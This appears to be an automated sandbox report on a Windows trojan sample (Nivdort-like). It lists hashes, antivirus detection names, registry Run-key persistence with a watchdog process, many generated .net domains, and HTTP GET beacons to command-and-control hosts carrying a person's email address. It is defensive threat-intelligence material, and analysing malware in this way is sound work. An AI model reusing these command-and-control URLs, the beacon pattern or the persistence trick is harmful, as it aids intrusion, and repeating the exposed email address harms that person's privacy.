Analysis Date2015-10-13 11:32:24
MD56961abdd516e904a3e3a3620545e3e32
SHA1f1ed070c1b536ef1c7d196776447f6eb017a8f54

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 457ef9f12870badaf5e12b3667cb25d9 sha1: 2269f2b1d19eafc170619ede447c60b83ad61557 size: 297984
Section.rdata md5: afcbf682181cac4ab898bdc2a604b20a sha1: 703aa426b3b3c5ca915a85874159f1f45da69837 size: 33280
Section.data md5: cac2e3324b53e470d5f74e7ac4329db7 sha1: c79db008c53708a05fed20178cdc5f5498f40848 size: 105472
Timestamp2014-10-30 09:49:44
PackerMicrosoft Visual C++ ?.?
PEhash04911ea88b5f3876a52fce552affd3f7cb1ec860
IMPhash10316e882f2bca018977163762ac7a6f
AVRisingno_virus
AVMcafeeTrojan-FEMT!6961ABDD516E
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Downloader-TLD [Trj]
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004cb2771 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVF-SecureGen:Variant.Symmi.22722

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Secure Background ➝
C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.gwfpg
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\iohmtkier\endzmqkomp.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\iohmtkier\lgycekuqkamg.exe"

Network Details:

DNShistoryadvance.net
Type: A
195.22.26.254
DNShistoryadvance.net
Type: A
195.22.26.231
DNShistoryadvance.net
Type: A
195.22.26.252
DNShistoryadvance.net
Type: A
195.22.26.253
DNSstrangestranger.net
Type: A
98.139.135.129
DNScollegeproblem.net
Type: A
208.100.26.234
DNSstrangeanimal.net
Type: A
199.83.128.18
DNSstrangeanimal.net
Type: A
199.83.132.18
DNSmiddleadvance.net
Type: A
DNStwelveadvance.net
Type: A
DNSmiddlestranger.net
Type: A
DNStwelvestranger.net
Type: A
DNSmiddlegoodbye.net
Type: A
DNStwelvegoodbye.net
Type: A
DNSmiddlefortieth.net
Type: A
DNStwelvefortieth.net
Type: A
DNSratheradvance.net
Type: A
DNSmorningadvance.net
Type: A
DNSratherstranger.net
Type: A
DNSmorningstranger.net
Type: A
DNSrathergoodbye.net
Type: A
DNSmorninggoodbye.net
Type: A
DNSratherfortieth.net
Type: A
DNSmorningfortieth.net
Type: A
DNSstrangeadvance.net
Type: A
DNShistorystranger.net
Type: A
DNSstrangegoodbye.net
Type: A
DNShistorygoodbye.net
Type: A
DNSstrangefortieth.net
Type: A
DNShistoryfortieth.net
Type: A
DNSamountadvance.net
Type: A
DNSweatheradvance.net
Type: A
DNSamountstranger.net
Type: A
DNSweatherstranger.net
Type: A
DNSamountgoodbye.net
Type: A
DNSweathergoodbye.net
Type: A
DNSamountfortieth.net
Type: A
DNSweatherfortieth.net
Type: A
DNSthickadvance.net
Type: A
DNSclassadvance.net
Type: A
DNSthickstranger.net
Type: A
DNSclassstranger.net
Type: A
DNSthickgoodbye.net
Type: A
DNSclassgoodbye.net
Type: A
DNSthickfortieth.net
Type: A
DNSclassfortieth.net
Type: A
DNSthinkescape.net
Type: A
DNSpresentescape.net
Type: A
DNSthinkanimal.net
Type: A
DNSpresentanimal.net
Type: A
DNSthinkproblem.net
Type: A
DNSpresentproblem.net
Type: A
DNSthinkmodern.net
Type: A
DNSpresentmodern.net
Type: A
DNSchiefescape.net
Type: A
DNScollegeescape.net
Type: A
DNSchiefanimal.net
Type: A
DNScollegeanimal.net
Type: A
DNSchiefproblem.net
Type: A
DNSchiefmodern.net
Type: A
DNScollegemodern.net
Type: A
DNSoftenescape.net
Type: A
DNSaloneescape.net
Type: A
DNSoftenanimal.net
Type: A
DNSaloneanimal.net
Type: A
DNSoftenproblem.net
Type: A
DNSaloneproblem.net
Type: A
DNSoftenmodern.net
Type: A
DNSalonemodern.net
Type: A
DNSmiddleescape.net
Type: A
DNStwelveescape.net
Type: A
DNSmiddleanimal.net
Type: A
DNStwelveanimal.net
Type: A
DNSmiddleproblem.net
Type: A
DNStwelveproblem.net
Type: A
DNSmiddlemodern.net
Type: A
DNStwelvemodern.net
Type: A
DNSratherescape.net
Type: A
DNSmorningescape.net
Type: A
DNSratheranimal.net
Type: A
DNSmorninganimal.net
Type: A
DNSratherproblem.net
Type: A
DNSmorningproblem.net
Type: A
DNSrathermodern.net
Type: A
DNSmorningmodern.net
Type: A
DNSstrangeescape.net
Type: A
DNShistoryescape.net
Type: A
DNShistoryanimal.net
Type: A
DNSstrangeproblem.net
Type: A
HTTP GEThttp://historyadvance.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
HTTP GEThttp://strangestranger.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
HTTP GEThttp://collegeproblem.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
HTTP GEThttp://strangeanimal.net/index.php?email=paolo@imesasrl.it&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 195.22.26.254:80
Flows TCP192.168.1.1:1032 ➝ 98.139.135.129:80
Flows TCP192.168.1.1:1033 ➝ 208.100.26.234:80
Flows TCP192.168.1.1:1034 ➝ 199.83.128.18:80

Raw Pcap

Strings